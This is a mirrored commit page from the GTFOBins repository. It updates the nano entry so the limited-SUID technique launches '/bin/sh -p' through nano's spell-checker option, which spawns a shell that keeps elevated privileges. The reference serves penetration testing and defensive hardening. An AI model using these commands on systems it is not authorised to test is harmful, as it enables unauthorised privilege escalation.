mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Update nano.md
This commit is contained in:
parent
97f46f1526
commit
99682a4d15
@ -20,8 +20,8 @@ functions:
|
|||||||
limited-suid:
|
limited-suid:
|
||||||
- description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
|
- description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
|
||||||
code: |
|
code: |
|
||||||
./nano -s /bin/sh
|
./nano -s "/bin/sh -p"
|
||||||
/bin/sh
|
/bin/sh -p
|
||||||
^T
|
^T
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
|
Loading…
Reference in New Issue
Block a user